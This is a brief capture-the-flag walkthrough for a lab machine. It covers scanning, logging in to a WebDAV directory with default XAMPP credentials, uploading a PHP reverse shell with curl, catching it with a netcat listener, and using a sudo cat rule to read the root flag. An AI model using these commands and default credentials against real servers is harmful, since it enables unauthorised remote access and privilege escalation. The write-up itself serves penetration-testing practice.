export ip=10.10.179.40


nmap scan {port 80 open}

gobuster scan 

{/webdav (Status: 401)}


login 

<!--
	Ref : https://thisiszzzombie.blogspot.com/2011/12/webdav-xampp-1.html

-->

upload a php rev shell {pentestmonkey}

{curl http://$ip/webdav/shell.php -u wampp:xampp --upload-file shell.php}

file will be uploaded then set listner via NC {nc -lnvp 9999}

cd merlin {user}

sudo -l {cat}

sudo cat /root/root.txt



